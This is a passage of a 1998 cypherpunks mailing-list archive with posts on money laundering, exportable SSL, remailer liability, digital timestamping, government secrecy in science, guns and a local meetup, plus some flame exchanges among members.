(650)341-1395 (fax)
Cindy@McGlashan.com
http://www.McGlashan.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 06:09:18 +0800
To: cypherpunks@Algebra.COM
Subject: Jalon'sWorld and Evil Money Laundering
In-Reply-To: <85256586.0029E630.00@openworld.com>
Message-ID: <v03102804b0daee2eab9a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:37 PM -0800 1/7/98, jalonz@openworld.com wrote:

>Notice the words "criminal investigations"? God forbid talent could
>actually be used for a good cause. The incidents in question were actually
>quite serious (Chinese mafia money laundering via phony real estate deals)
>and not at all like the porno bbs confiscation crap you'd be thinking of.

And what is morally wrong with "money laundering"? Seems to me a person's
money is his to do with it as he pleases...it's only governments that call
some actions "money laundering." Just as they call some speech "information
laundering."

And do you think your "Digital Society" notion (which we've seen many times
before, usually involving floating, offshore entities) will somehow not
attract or involve "Chinese mafia money launderers"?

Do you plan to implement key escrow so you can monitor what your residents
are doing with each other? Do you plan to become a floating police state so
as to stop this evil "money laundering"?

I don't think you've quite grasped the significance of strong crypto and
cyberspace.

(For starters, an intentional community in cyberspace, situated in no
particular country, and backed by strong crypto, digital escrow systems
(real escrow, of course), reputation systems, etc. is a far better place to
do business of certain sorts than is "Jalon'sWorld.")

I suspect that Guy is right, that your "Digital Society" shtick is just the
latest in your long series of "new businesses" started in many places in
the country.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Fri, 9 Jan 1998 06:09:25 +0800
To: Mix <mixmaster@remail.obscura.com>
Subject: Re: your mail
In-Reply-To: <199801081204.EAA28274@sirius.infonex.com>
Message-ID: <Pine.A41.3.95.980108135350.27418A-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 8 Jan 1998, Mix wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Tim C. May's reheated, refurbished, and regurgitated cud is 
> completely inappropriate for the mailing lists into which it is 
> cross-ruminated.
> 
>    |     |
>    |  O  | Tim C. May
>    (--|--)
>       |
>      / \
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 9 Jan 1998 04:13:12 +0800
To: "'David Honig'" <honig@otc.net>
Subject: RE: MS Server Gated Crypto: strong encryption w/ exportable browsers if the server is US-OK
Message-ID: <6B5344C210C7D011835C0000F80127668B15D0@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




Netscape got this deal quite some time ago, so it's hardly a special
priviliege for MS. 
It lets certain (trusted by the US government) servers to use strong
encryption with US
products outside of the US.

Peter Trei
Disclaimer: I am not speaking for my employer.

> ----------
> From: 	David Honig[SMTP:honig@otc.net]
> Reply To: 	David Honig
> Sent: 	Thursday, January 08, 1998 12:02 PM
> To: 	cypherpunks@toad.com
> Subject: 	MS Server Gated Crypto: strong encryption w/ exportable
> browsers if the server is US-OK
> 
> 	
> The jist of
> http://eu.microsoft.com/industry/finserv/m_finserv/m_fordev_g.htm
> is, MS has US permission to export a DLL containing 128-bit SSL
> *worldwide*
> since
> the encryption is enabled IFF there's a Verisign "SGC certificate" on
> the
> *server*.
> This apparently will work with Netscape servers in addition to IIS.
	[...]
> ------------------------------------------------------------
>       David Honig                   Orbit Technology
>      honig@otc.net                  Intaanetto Jigyoubu
> 
> 	"How do you know you are not being deceived?" 
> 	---A Compendium of Analytic TradeCraft Notes, 
> 	Directorate of Intelligence, CIA
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 9 Jan 1998 07:00:54 +0800
To: "Robert A. Costner" <tcmay@got.net>
Subject: Re: Remailers & N.E.T.
In-Reply-To: <v03102803b0daeb29f609@[207.167.93.63]>
Message-ID: <v04003a02b0dafbe6183f@[130.248.15.51]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:25 PM -0800 1/8/98, Robert A. Costner wrote:
>At 12:47 PM 1/8/98 -0800, Tim May wrote:
>>(Though the SPA and others may then go after the remailers. Ironically, the
>>CDA exempted remailers--though not by name--from liability for messages.)
>
>Unfortunately you are semi wrong here.  The CDA specifically does not cover
>Intellectual property matters, and the SPA has consistently insisted that
>the ISPs are liable for what their users do with copyrighted materials.
>
I had a professor in college who called this kind of argument
"Proof by repeated assertion".

That is what the SPA (a private organization) is doing.

-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 9 Jan 1998 05:04:02 +0800
To: cypherpunks@toad.com
Subject: Vulis again
Message-ID: <199801081949.OAA25833@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   Tim C. May's reheated, refurbished, and regurgitated cud is 
   >   completely inappropriate for the mailing lists into which it is 
   >   cross-ruminated.
   >   
   >      |     |
   >      |  O  | Tim C. May
   >      (--|--)
   >         |
   >        / \

Talk about reheated, refurbished, and regurgitated...

Vulis must be getting old.
---guy

   So, die, already.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 9 Jan 1998 06:32:29 +0800
To: pooh@efga.org
Subject: time-stamp server uses (Re: Question on U.S. Postal Service and crypto)
In-Reply-To: <3.0.3.32.19980108035645.037abe0c@mail.atl.bellsouth.net>
Message-ID: <199801081450.OAA00500@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Robert Costner <pooh@efga.org> writes:
> [...]  The timestamping is a action that "postmarks" the digitally
> signed message.  Many attorneys feel this is a very good thing,
> though I have had a hard time justifying the need for this to some
> technically inclined people.

One use for time-stamping is to allow digital signatures to out-live
the validity period of a given public private key pair.  If the
time-stamped signature shows that the document was signed during the
life-time of the signing key pair this provides additional assurance
that the signature is still valid despite the fact that the key is now
marked as expired, or was say later compromised and revoked.

Lots of other uses for time-stamping services also; I thought of a use
for them in the eternity service in preventing race conditions.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 9 Jan 1998 05:16:03 +0800
To: cypherpunks@toad.com
Subject: Re: The Digital Society Group
Message-ID: <199801081954.OAA26406@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From jalonz@openworld.com Thu Jan  8 02:19:34 1998
   >   Received: from openworld.com (www.openworld.com [205.157.133.52])
   >   	by mail1.panix.com (8.8.8/8.8.8/PanixM1.3) with SMTP id CAA24973
   >   	for <guy@panix.com>; Thu, 8 Jan 1998 02:19:34 -0500 (EST)
   >   From: jalonz@openworld.com
   >   Received: by openworld.com(Lotus SMTP MTA SMTP v4.6 (462.2 9-3-1997))  id 85256586.00285987 ; Thu, 8 Jan 1998 02:20:43 -0500
   >   X-Lotus-FromDomain: OPENWORLD.COM
   >   To: Information Security <guy@panix.com>, cyberpunks@toad.net

Cyberpunks?

You really know how to score points!

   >   Message-ID: <85256586.00280ED7.00@openworld.com>
   >   Date: Thu, 8 Jan 1998 02:22:05 -0500
   >   Subject: Re: The Digital Society Group
   >   Mime-Version: 1.0
   >   Content-type: text/plain; charset=us-ascii
   >   Status: R
   >   
   >   
   >   >#   SAN DIEGO DISTRICT ATTORNEY'S OFFICE.
   >   >#
   >   >#   Computer Security - Provide computer security assistance in criminal
   >   >#   investigations.  Tasks include data decryption, recovering erased
   >   data,
   >   >#   password retrieval, data line monitoring, and protected system entry.
   >   >
   >   >Isn't that last item special?
   >   >
   >   >---guy
   >   >
   >   >   And a possible reason for heading the other way.
   >   
   >   guy,
   >   
   >   tough noogies
   >   
   >   deal with it...
   >   
   >   Notice the words "criminal investigations"? God forbid talent could
   >   actually be used for a good cause. The incidents in question were actually
   >   quite serious (Chinese mafia money laundering via phony real estate deals)
   >   and not at all like the porno bbs confiscation crap you'd be thinking of.
   >   
   >   :)
   >   jqz

Just curious what your reaction would be to that ambiguous statement.

Having done DA support, I expect you are quite serious
about heading the other way to give users security
and anonymity. How do you justify both, since the
"bad guys" would benefit?

----

It's the other stuff: that you flit around (people posting "Where
are you Jalon Q. Zimmerman?"), that The Digital Society doesn't
have its own domain, but is hosted by some other company called
"OpenWorld", which has AOL contact addresses...

Who is Mark Frazier, who owns OpenWorld, how long has it been in
business, what is your relationship to them, what is your job
description? Is OpenWorld another startup that is going to go <poof>?

The OpenWorld pages read like any other company BS, and you've
given yourself the lofty title "Director".

Yeah, and we have Sir Timothy May, Dr. Dim Vulvis, etc.

You're about 26, and full of hot air.
---guy

   You mean well. ;-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Sat, 10 Jan 1998 00:20:25 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <199801062128.VAA00264@server.eternity.org>
Message-ID: <Pine.LNX.3.91.980108150229.3198A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> > I haven't seen the USG RSA key -- if it's 512 bits, that would be a humorous
> > next factoring target.

Talking of factoring I wonder if anyone on the list has seen the article 
in this months new scientist regarding a new link found between energy 
levels in hydrogen atoms and generation of large primes, I don`t remember 
the details (I only scanned the article as even the elementary 
explanation of the physics involved was beyond me), The thrust of the 
article was that work was in progress on a variant of this that could 
factor large numbers significantly faster than current methods. 
Anyone with more background in this sort of thing care to comment?

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Sat, 10 Jan 1998 01:18:36 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: cypherpunks and guns
In-Reply-To: <19980106005136.23824@eskimo.com>
Message-ID: <Pine.LNX.3.91.980108152140.3198B-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain





> I don't understand why there is so much talk about guns here lately.
> Unless someone comes up with a weapon that has some very unusual economic
> properties, individuals cannot hope to compete with governments in the
> domain of deadly force. If we have to resort to physical violence, we've
> already lost!

Ready availablity of defensive weaponry to citizens does create very 
unusual circumstances in that a motivated population can defeat the 
government by pure force of numbers, the fact is, the population is not 
motivated and most of the sheeple swallow the state BS, and just in case, 
most governments restrict citizens access to weapons and ignore the 
citizens right to defend themselves against attack (not that this will 
stop those of us who are motivated). 

Paul Bradley, who may or may not be prepared to defend himself.

        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Fri, 9 Jan 1998 05:30:27 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:2F4707F94158BBCDE58F1FC30140DD96>
Message-ID: <34B560A2.2F2C@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Consider Andrew Wiles, Princeton math professor, and the prover of Fermat's
> Last Theorem. He labored in secrecy for many years, only going public when
> he felt his results were complete. (As it turned out, they were not, and he
> needed another year or two to fill in some gaps.)

You may have seen the same TV show I saw on him.  I really enjoyed it.

Is there any evidence that he got (ahem) outside funding for his project?
In the back of my paranoid mind, I wondered that since he was dealing with
elliptic curves and modular arithmetic if...  I mean, how did he pay his
mortgage?  The show implied that he was not doing any real teaching most
of that time, and if no one at the school knew of his work, then where was
the money coming from?

--David Miller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 9 Jan 1998 05:36:12 +0800
To: David Miller <dm0@avana.net>
Subject: Re: Question on U.S. Postal Service and crypto
In-Reply-To: <3.0.3.32.19980108035645.037abe0c@mail.atl.bellsouth.net>
Message-ID: <3.0.3.32.19980108152654.03ba8028@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:45 AM 1/8/98 -0800, David Miller wrote:
>> An interesting feature of the digital postmark is that the USPS was making
>> the claim that if you receive an email that the USPS send to you that was
>> not meant for you, then you have committed a federal crime when you read
it.
>
>I'm not so sure about this, Robert.  I've heard the rumor that it is a crime,
>but I have also heard that if something is delivered to your box, it is yours
>and you are not required to send it back unopened if it is not addressed to
>you.  I tend to believe the latter, as it is the side of the story shared by
>USPS employees.

I wasn't commenting on the legality, but on the fact that the USPS web page
was making the claim that it was a crime.  Apparently whoever wrote the
legal disclaimer felt that email could be misdelivered in the same fashion
in which postal mail could be misdelivered and was making this claim.  I
found the claim to be nutty and made me think they didn't know what they
were doing.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kozmo killah <k0zm0z@yahoo.com>
Date: Fri, 9 Jan 1998 09:22:15 +0800
To: SpdrMan@aotto.com
Subject: Re: System
Message-ID: <19980108235246.12395.rocketmail@send1b.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain





which system did you want?



---"Adrian J. Otto" <aotto@hangar.jetlink.net> wrote:
>
> Cosmos,
> 
> Ok, I want to buy. Tell me more details.
> 
> Adrian
> 

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 9 Jan 1998 09:02:39 +0800
To: cypherpunks@cyberpass.net
Subject: "Trade a Tape, Go to Jail?" from Wired News
Message-ID: <Pine.GSO.3.95.980108155835.10517d-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 18:46:37 -0500
From: Steve Silberman <digaman@wired.com>
To: declan@well.com
Subject: Re: FC: How long you'll be in jail for copyright violations

Declan:

	An interesting corrollary to the Netly story - I wrote an article
for Wired News today that might be of interest to anyone who trades tapes
on the Net, especially those who post their "lists" to the Web and accept
cash for trades - even when there is no profit involved.

"Trade a Tape, Go to Jail?"
http://www.wired.com/news/news/culture/story/9532.html

			Steve


**********************************
Steve Silberman
Senior Culture Writer
WIRED News
   http://www.wired.com/
***********************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 06:43:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Austin Cypherpunks - Physical Meeting - Sat. Jan. 17, 1998
Message-ID: <199801082209.QAA04856@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

The Austin Cypherpunks will be holding a physical meeting on Saturday,
January 17th, 1998. It will be from 6-7pm at Flipnotics on Barton Springs
Rd. The meeting is open to all. If you would like directions please send
a note to austin-cpunks@ssz.com.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 9 Jan 1998 07:32:13 +0800
To: Information Security <guy@panix.com>
Subject: Re: The Digital Society Group
In-Reply-To: <199801081954.OAA26406@panix2.panix.com>
Message-ID: <199801082237.RAA09999@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801081954.OAA26406@panix2.panix.com>, on 01/08/98 
   at 02:54 PM, Information Security <guy@panix.com> said:

>Having done DA support, I expect you are quite serious
>about heading the other way to give users security
>and anonymity. How do you justify both, since the
>"bad guys" would benefit?

Well just because the DA says someone is a BadGuy(TM) does not make it so.

I for one would feel safer with the majority of BadGuys(TM) as neighbors
than I would with Lawyers and DA's. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLVSzo9Co1n+aLhhAQHhlgP/ajGh6pYuVrvzWIhPXKNv02HZAigRHgk2
z0sXTMZt+K0LDOx6gC6RGtiYtjOcQeoFvnGiw10PSu/6R7L5FXE/EmTI8Mpatx8b
vW5Ql89HBwZFOd3UwCQ/g4uFQTotUocXMyCLZszhkHAvPywDMU3nHDaJXXQgOIx8
z1gSN9T6G3g=
=+3Pc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 9 Jan 1998 06:29:13 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Remailers & N.E.T.
In-Reply-To: <3.0.3.32.19980108004628.03b6bbe8@mail.atl.bellsouth.net>
Message-ID: <3.0.3.32.19980108162541.0371f1f0@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 12:47 PM 1/8/98 -0800, Tim May wrote:
>(Though the SPA and others may then go after the remailers. Ironically, the
>CDA exempted remailers--though not by name--from liability for messages.)

Unfortunately you are semi wrong here.  The CDA specifically does not cover
Intellectual property matters, and the SPA has consistently insisted that
the ISPs are liable for what their users do with copyrighted materials.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Jan 1998 09:43:24 +0800
To: Jim Gillogly <jim@acm.org>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <34B4CFF0.858FF03C@acm.org>
Message-ID: <199801090031.QAA01391@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>Vladimir Z. Nuri wrote:
>> scientists who agree to government secrecy to develop
>> their inventions are agreeing to a lot more than
>> mere secrecy. they are committing to a paradigm that
>> is at odds with science itself, which only advances through
>> the open literature.
>
>Why limit your annoyance to government scientists?  Scientists
>in private industry are in the same position, developing (e.g.)
>algorithms and analytical methods protected by trade secrets.
>Society recognizes this tendency and tries to advance science
>anyway by offering patent protection. 

a patent is not at all the same as a secrecy order issued by
the NSA, and shame on you for suggesting so. we both know you
are far more intelligent than this, and this is a feeble
argument.

how can you possibly compare the two cases? in one case, there
is no knowledge whatsoever allowed to leak from a government
agency. in the other case, the patent is published in a 
government forum for searching by anyone. there is no SECRECY
in a patent, it in fact is a PUBLIC DECLARATION OF OWNERSHIP
supported by a DISCLOSURE system. the NSA and all secret
agencies are fundamentally ANTI DISCLOSURE and use their
supposed claims of NATIONAL SECURITY to EVADE ACCOUNTABILITY
TO THE PUBLIC and even the namby-pamby, gutless, souless
BUREACRATS in congress.

Jim G., how many scientists are now working on government
WEAPONRY programs? how much money of taxes is being funneled
to them? and you compare them with private sector scientists
who are scrounging to make ends meet in this twisted con game
we call the modern economy? Chomsky is right, its WELFARE FOR
BUSINESS via vast subsidies to the so-called "defense" industry.
its nothing but WAR TOYS FOR WAR MONGERS.

 You don't make money by
>giving away your intellectual capital.  Seems to me that schools
>and independently wealthy scientists/foundations are the only
>ones who don't merit your censure on this count.

what does this have to do with the NSA or weapons development,
to which I was referring to in my essay?  neither has anything
to do with making money, and quite frankly I'm ashamed that
someone as intelligent as you would suggest there is any
similarity.

you're using one of the most feeble arguments in the world.
two wrongs do not make a right. "those darn scientists in
private industry are into secrecy too. secrecy is a basic
part of life on planet earth". perhaps so, but secrecy in
GOVERNMENT is ANTITHETICAL to freedom, and there is a
direct proportion of the INCREASE IN SECRECY to the
INCREASE IN TYRANNY.

sorry to RANT but your post makes my blood boil. feel free
to have your deluded fantasies in private, but if you post, I'll
rant.

gosh,  JimmyG, have you read about how area 51 was charged
with a lawsuit for burning toxic wastes by the widow
of a dead employee? would you like me to post it for you?
do you hold this up as an example of government accountability?
or is it in fact government that no longer serves the people?
a government that in fact is in total contempt of its citizens?
food for thought, eh? I suppose it would make anyone with 
a conscience tend to THINK-- presuming they really have one.
its a rare quality in these times, don't you think, JimmyG?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Jan 1998 10:00:02 +0800
To: Tim May <tcmay@got.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102800b0dac9cd1f90@[207.167.93.63]>
Message-ID: <199801090042.QAA02172@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




every respondent to my post has missed the key points.
I will post soon the list an article demonstrating my
anger at the betrayal of sound government by a sinister state
that has hijacked it.

>Scientists even in schools and foundations are often secretive, too.
>
>The notion that "science" is about blabbing one's latest discoveries or
>theories is overly simplistic. Many scholars and scientists choose not to
>publicize their work for years, or decades, or, even, never.

if so, they are not SCIENTISTS. a key aspect of SCIENCE is publishing
results. science cannot advance without it. name me one scientist
who did not publish an important result, or is considered a good
scientists for doing so!

>Consider Andrew Wiles, Princeton math professor, and the prover of Fermat's
>Last Theorem. He labored in secrecy for many years, only going public when
>he felt his results were complete. (As it turned out, they were not, and he
>needed another year or two to fill in some gaps.)

but he PUBLISHED his results, he gave a LECTURE on his findings. I am
not saying that secrecy and science are mutually exclusive in this way.
secrecy is a useful tool, I am not in general against secrecy. but
secrecy can be ABUSED, and our government is ABUSING it. 

have you
been following that Clinton was just fined $286,00 for lying to
a judge? what do you think it was about? the government LIED that
health hearings were being attended only by federal employees, and
were thus exempt from mandatory public hearings. a law requires that
if private individuals attend, the hearing must be OPEN and not
SECRET!! for good reason!! our government is hijacked through
SECRECY. in fact the hearing could be public even
with federal employees only, and the law should have gone further
but only stopped where it did!!

>Corporate scientists now outnumber academic or foundation scientists, and
>they are quite understandably under various restrictions to keep results
>secret, at least for a while.

"at least for a while" is the key phrase. "forever" would be false.
again, secrecy is a tool.

>Science does not "only advance through the open literature." There are many
>other checks and balances which accomplish the same effect.

name one.

 I could give
>dozens of examples of where the open literature either did not exist or was
>not used...and science still advanced.

but science eventually published the results. the lack of publishing
held back science collectively. science had to rediscover something
that had already been discovered. it is misleading to suggest that
science "advanced" as you do here. those findings that are withheld
from the scientific literature do not advance science as a collective
human endeavor. how can you argue with something so obvious?

all this is uninteresting to me-- I was making a moral point in an
essay that is obviously unintelligable to most people here. its my
big mistake in this world, to pretent that morality plays a role.
as EH once said, normative philosophies are a waste of time. what
room does the world have for someone who thinks only in terms
of how things should be? things ARE, PERIOD. good lord, no wonder 
Ayn Rand is so uninfluential.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 9 Jan 1998 08:01:56 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: time-stamp server uses (Re: Question on U.S. Postal Service and crypto)
In-Reply-To: <199801081450.OAA00500@server.eternity.org>
Message-ID: <199801082306.SAA10265@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801081450.OAA00500@server.eternity.org>, on 01/08/98 
   at 02:50 PM, Adam Back <aba@dcs.ex.ac.uk> said:


>Robert Costner <pooh@efga.org> writes:
>> [...]  The timestamping is a action that "postmarks" the digitally
>> signed message.  Many attorneys feel this is a very good thing,
>> though I have had a hard time justifying the need for this to some
>> technically inclined people.

>One use for time-stamping is to allow digital signatures to out-live the
>validity period of a given public private key pair.  If the time-stamped
>signature shows that the document was signed during the life-time of the
>signing key pair this provides additional assurance that the signature is
>still valid despite the fact that the key is now marked as expired, or
>was say later compromised and revoked.

No it does not.

The date that a Key becomes comprimised and the date that the owner of a
Key knowns it is comprimised are two very different things and somthing
that time-stamping can not solve.

You also have at issue of what does one do with long term signatures if
the undelying technology is broken. Say you sign a 30yr morgage
electronically and 15yrs latter the algorithms that were used and now
broken.

Not to mention what does one do when the time-stamping key is comprimised.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLVZgY9Co1n+aLhhAQF5HAQAvGRMd3YWhcQiZyaYrK7EJ46JC53E92h9
IR6QuO3rew6wdwUNavg6TPRgpF8L9kXAKaH35IFePBvfsSKzoCMxsSpdcoo4RuMx
ZMqa81jWaJmKBNjAhyD1qSwsgiQnXaAEcAV7mIa3AboUm8bfA1JbfwiA/SE7i/g2
uF08Pnh90Yw=
=KT64
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Jan 1998 07:09:37 +0800
To: cypherpunks@cyberpass.net
Subject: HAYEKWEB: Hackney on Law & Econ History & Hayek
Message-ID: <v04003903b0dafcf189ec@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Thu, 8 Jan 1998 14:56:33 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Gregransom <Gregransom@AOL.COM>
Organization: AOL (http://www.aol.com)
Subject:      HAYEKWEB: Hackney on Law & Econ History & Hayek
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

>>  Hayek on the Web  <<     --    Law & Economics

"Law and Neoclassical Economics: Science, Politics, and
the Reconfiguration of American Tort Law Theory" by James R. Hackney, Jr.
on the Web at:

http://www.press.uillinois.edu/journals/lhrforums.html

>From "Law and Neoclassical Economics: Science, Politics, and
the Reconfiguration of American Tort Law Theory" by James R. Hackney, Jr.:

" .. C. The Antistatist Imperative: F. A. Hayek
and the Road to Law and Neoclassical Economics

The technique of analysis coming out of early twentieth-century Vienna
was not linked to any particular ideological position. In fact, Janik and
Toulmin illustrate that the fundamental position could be characterized
as "apolitical." However, F. A. Hayek independently provided a distinct
ideological position shaped by the Viennese experience41 that had a
profound impact on ideological debates in post-World War II America
and, by extension, on economic analysis. Hayek's migration to England
influenced the LSE debates that are crucial to understanding the strands
of economic thought that framed Coase's work in particular, and law and
neoclassical economics in general. In addition, Hayek directly shaped
the law and neoclassical economics project at the University of Chicago.42
Hayek stated his ideological position in The Road to Serfdom.43  He
asserted that Serfdom "is a political book" and that "all I shall have to
say is derived from certain ultimate values."44 Written while Hayek
held a professorship at the LSE, Serfdom was conceived as a direct
